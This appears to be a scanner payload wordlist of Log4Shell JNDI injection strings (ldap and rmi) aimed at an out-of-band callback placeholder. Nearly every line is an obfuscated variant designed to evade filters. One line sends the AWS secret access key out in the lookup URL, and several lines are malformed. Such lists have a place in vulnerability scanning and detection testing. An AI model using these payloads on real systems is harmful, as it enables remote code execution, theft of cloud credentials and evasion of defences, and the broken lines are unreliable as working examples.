${jndi:ldap://{{interactsh-url}}/z}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//{{interactsh-url}}/z}
${jndi:ldap://{{interactsh-url}}/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://{{interactsh-url}}/z}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://{{interactsh-url}}/z}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{interactsh-url}}/z}
${jnd${upper:ı}:ldap://{{interactsh-url}}/z}
${jnd${sys:SYS_NAME:-i}:ldap:/{{interactsh-url}}/z}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://{{interactsh-url}}/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://{{interactsh-url}}/z}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://{{interactsh-url}}/z}
${\u006a\u006e\u0064\u0069:ldap://{{interactsh-url}}/z}
${jndi:ldap://127.0.0.1#{{interactsh-url}}/z}
{123%25ff:-}:ldap://{{interactsh-url}}/a}
{k8s:k5:-ND}i${sd:k5:-:}ldap://{{interactsh-url}}/a}
{123%25ff:-${123%25ff:-i:}}ldap://{{interactsh-url}}/a}
${jndi:ldap://{{interactsh-url}}/a}
{upper:${lower:n}}di:ldap://{{interactsh-url}}/a}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://{{interactsh-url}}/a}
${${env:BARFOO:-j}Ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//{{interactsh-url}}/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{interactsh-url}}/ass}
${${::-j}ndi:rmi://{{interactsh-url}}/ass}
${jndi:rmi://{{interactsh-url}}}
${${lower:jndi}:${lower:rmi}://{{interactsh-url}}/poc}
${${lower:${lower:jndi}}:${lower:rmi}://{{interactsh-url}}/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{interactsh-url}}}
${${::-j}ndi:rmi://{{interactsh-url}}}
${${lower:jndi}:${lower:rmi}://{{interactsh-url}}}
${${lower:${lower:jndi}}:${lower:rmi}://{{interactsh-url}}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}:}{{interactsh-url}}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}
${${::-j}ndi:rmi://{{interactsh-url}}/ass}
${jndi:rmi://{{interactsh-url}}}
${${lower:jndi}:${lower:rmi}://{{interactsh-url}/poc}
${${lower:${lower:jndi}}:${lower:rmi}://{{interactsh-url}/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{interactsh-url}/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{interactsh-url}}/poc}
{upper:n:-}di:ldap://{{interactsh-url}}
{k8s:k5:-ND}i${sd:k5:-:}ldap://{{interactsh-url}}}
{main:\k5:-Nd}i${spring:k5:-:}ldap://{{interactsh-url}}}
{sys:k5:-nD}${lower:i${web:k5:-:}}ldap://{{interactsh-url}}}
{::-nD}i${::-:}ldap://{{interactsh-url}}}
{EnV:K5:-nD}i:ldap://{{interactsh-url}}}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:l}dap${env:NaN:-:}//{{interactsh-url}}/a}
${${upper:}jndi:ldap://{{interactsh-url}}/a}
{upper::-n}di:ldap://{{interactsh-url}}/a}




















